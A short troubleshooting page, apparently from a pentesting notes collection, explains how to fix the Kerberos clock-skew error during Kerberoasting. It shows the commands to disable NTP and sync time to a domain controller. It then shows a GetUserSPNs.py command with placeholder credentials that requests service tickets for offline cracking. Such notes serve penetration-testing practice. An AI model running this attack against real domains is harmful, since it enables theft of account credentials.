Clock Skew Too Great

🛠 Fixing “Kerberos SessionError: KRB_AP_ERR_SKEW (Clock skew too great)” During Kerberoasting

If you encounter the KRB_AP_ERR_SKEW error while attempting Kerberoasting (usually due to time differences between your machine and the target Domain Controller), follow these steps:

🔧 Step-by-Step Fix:

  1. Switch to root (if not already):

    su

  2. Disable automatic time sync (NTP):

    timedatectl set-ntp off

  3. Manually sync your system time with the target machine:

    rdate -n [Target_IP]

  4. Rerun your Kerberoasting command: Example:

    python3 GetUserSPNs.py [domain].local/[username]:[password] -dc-ip [DC_IP] -request

Note:

  • Make sure rdate is installed (apt install rdate if missing).

  • Use the Domain Controller’s IP as the target for rdate.

✅ Once your time is synced correctly, the clock skew error should no longer occur.

PreviousRDPNextLinux Privilege Escalation

Last updated

Was this helpful?